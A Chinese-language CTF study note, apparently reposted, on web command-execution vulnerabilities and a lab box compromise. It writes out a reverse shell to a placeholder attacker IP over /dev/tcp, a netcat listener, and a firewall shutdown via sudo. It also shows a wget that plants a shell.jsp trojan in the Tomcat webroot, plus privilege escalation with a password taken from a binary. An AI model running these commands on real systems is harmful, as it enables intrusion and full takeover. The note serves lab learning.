ctf-web-web安全命令執行漏洞-思路筆記


命令執行漏洞介紹

  • 當應用需要調用一些外部程序去處理內容的情況下,就會用到一些執行系統命令的函數。如PHP中的system、exec、shell_exec等,當用戶可以控制命令執行函數中的參數時,將可以注入惡意系統命令到正常命令中,造成命令執行攻擊。
  • 調用這些函數執行系統命令的時候,如果將用戶的輸入作為系統命令的參數拼接到命令行中,又沒有過慮用戶的輸入的情況下,就會造成命令執行漏洞。

手動滲透流程

  1. 信息探測image
  2. 深度挖掘,發現可利用命令漏洞image
  3. 漏洞利用
    1. 查看臨時緩沖目錄: ls -alh /tmp/
    2. 查看home目錄,挖掘用戶信息:ls -alh/home/image
    3. 查看具體用戶的目錄:ls -alh/home/用戶名/
    4. 查看系統信息: uname –a
    5. 利用ssh命令執行root權限命令:
      1. 使用ssh用戶名@localhost通過ssh登錄服務器是不需要身份驗證的;
      2. 查看bill用戶sudo命令的權限:ssh bill@localhost sudo –l
      3. 關閉防火牆: ssh bill@localhost sudo ufw disable
  4. 生成上傳shell
    1. 攻擊機啟動監聽netcat:nc -nlvp. 4444
    2. 靶場機器反彈tcp到shell:ssh bill@localhost  sudo bash -i >& /dev /tcp/攻擊機IP/4444  0>&1
    3. 方法二-也可以上傳SHELL滲透測試技巧
      1. 開啟python簡易http服務器:python -m SimpleHTTPServer
      2. 利用命令執行下載木馬文件:ssh bill@localhost sudo wget "http:/ /ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp

使用集成工具測試web命令執行漏洞

  1. 信息探測
    1. 使用sparta工具進行信息探測
    2. 輸入sparta打開工具
    3. image
    4. dirbuster需要設置的字典在這,設置已知信息image
    5. 查看已經掃描到的敏感信息,發現一對hashimage
    6. 破解hash得到密碼,嘗試登陸,登陸成功image
  2. 漏洞利用
    1. 使用AVWS工具進行掃描沒有發現漏洞
  3. 反彈shell
    1. image
    2. 查找敏感信息,發現一個image
    3. 進入該文件夾,發現兩個文件,查看說明,cutomPermissionApp是個用戶權限提升文件image
    4. 使用string命令查看文件有哪些敏感字符串image
    5. 發現敏感信息image
    6. 去掉H得到一個密碼image
    7. 嘗試登陸su:sudo su  回車輸入密碼成功提升權限


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM